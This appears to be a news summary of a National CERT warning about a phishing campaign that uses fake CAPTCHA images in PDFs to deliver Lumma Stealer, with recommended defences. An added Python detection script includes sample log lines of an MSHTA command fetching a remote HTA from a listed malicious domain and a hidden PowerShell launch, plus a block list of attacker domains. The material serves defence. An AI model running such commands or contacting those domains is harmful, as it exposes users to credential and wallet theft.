The National Computer Emergency Response Team (National CERT) has issued a warning about a sophisticated phishing campaign exploiting fake CAPTCHA images in PDF files to spread Lumma Stealer malware.
Scope of the Attack
The attack has affected thousands of users across various sectors, including technology, financial services, and manufacturing. The primary targets are located in North America, Asia, and Southern Europe.
Cybercriminals Exploit Search Engine Manipulation
Attackers are using search engine manipulation to distribute malicious PDFs. These PDFs redirect users to fake websites designed to steal sensitive financial data or silently install malware on their devices.
How the Attack Works
The attack involves deceptive PDF files containing fake CAPTCHA images. These images prompt users to click on a link that leads them to phishing websites. Once on these fraudulent sites, victims either have their financial data stolen or are tricked into running PowerShell scripts, launched through MSHTA commands, that install Lumma Stealer malware.
The attackers are hosting these PDFs on seemingly legitimate platforms such as PDFCOFFEE, PDF4PRO, and Internet Archive, making them appear trustworthy in search engine results.
The Dangers of Lumma Stealer Malware
Lumma Stealer is a Malware-as-a-Service (MaaS) tool that steals login credentials, browser cookies, and cryptocurrency wallet information. It also delivers GhostSocks, a proxy malware that abuses the victim's internet connection. Stolen credentials are sold on underground forums such as Leaky[.]pro. Malicious domains associated with this attack include pdf-freefiles[.]com, webflow-docs[.]info, secure-pdfread[.]site, and docsviewing[.]net.
Recommended Security Measures
National CERT advises immediate action to protect against this threat. Key recommendations include:
- Employee Education: Raising awareness of phishing risks and suspicious links.
- Advanced Endpoint Protection: Deploying stronger endpoint security to detect and prevent malware.
- Restrict PowerShell and MSHTA: Limiting the execution of these scripts to prevent malware installation.
- Block Malicious Domains: Blocking known malicious domains and monitoring for new fraudulent websites.
- Enable PowerShell Logging: To track suspicious activity related to PowerShell commands.
- Enforce Multi-Factor Authentication (MFA): Reducing the risk of credential theft.
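As an added illustration of the logging and MSHTA/PowerShell recommendations (this is not code from National CERT or from the advisory), the following Python script runs three simple detection rules over constructed sample process-creation events: mshta.exe started with a remote URL, PowerShell spawned by mshta.exe, and a command line that references one of the domains listed above. The key=value log format and the rule names are assumptions; the sample events are constructed, not real telemetry.

```python
import re

# Domains named in the advisory, written in refanged form for matching.
ADVISORY_DOMAINS = {"pdf-freefiles.com", "webflow-docs.info",
                    "secure-pdfread.site", "docsviewing.net"}

# Constructed sample process-creation events (not real telemetry), in an
# assumed key=value form: parent image, child image and command line.
SAMPLE_LOG = """\
parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\mshta.exe cmdline="mshta https://secure-pdfread[.]site/view.hta"
parent=C:\\Windows\\System32\\mshta.exe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell -nop -w hidden -c <redacted>"
parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\notepad.exe cmdline="notepad report.txt"
parent=C:\\Program Files\\Adobe\\Acrobat\\Acrobat.exe image=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe cmdline="chrome https://docsviewing[.]net/captcha"
"""

LINE_RE = re.compile(r'parent=(?P<parent>.+?) image=(?P<image>.+?) cmdline="(?P<cmdline>.*)"')

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def refang(text: str) -> str:
    """Turn defanged 'example[.]com' back into 'example.com' for matching."""
    return text.replace("[.]", ".").lower()

def check_event(parent: str, image: str, cmdline: str) -> list[str]:
    """Return the names of every detection rule this event matches."""
    hits = []
    child, mother = basename(image), basename(parent)
    cmd = refang(cmdline)
    if child == "mshta.exe" and re.search(r"https?://", cmd):
        hits.append("mshta_remote_content")      # MSHTA pulling remote content
    if mother == "mshta.exe" and child in ("powershell.exe", "pwsh.exe"):
        hits.append("powershell_spawned_by_mshta")  # the chain the advisory describes
    if any(d in cmd for d in ADVISORY_DOMAINS):
        hits.append("advisory_domain_contact")   # listed domain in a command line
    return hits

def analyze(log_text: str) -> list[tuple[int, str]]:
    """Parse each log line and return (line_number, rule) pairs for matches."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than fail the whole run
        for rule in check_event(**m.groupdict()):
            findings.append((n, rule))
    return findings
```

Run `analyze(SAMPLE_LOG)` to see which sample lines trip which rule; in practice the domain rule should be fed from a maintained blocklist rather than a literal set.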
Proactive Cybersecurity Practices
To counter the evolving threat landscape, National CERT urges organizations to implement cybersecurity best practices, including:
- Regular patch management to address vulnerabilities.
- Restricting administrative privileges to limit the potential attack surface.
- Using application whitelisting to prevent unauthorized applications from executing.
As cybercriminals continue to refine their tactics, staying vigilant and strengthening security controls are essential to guarding against large-scale data breaches.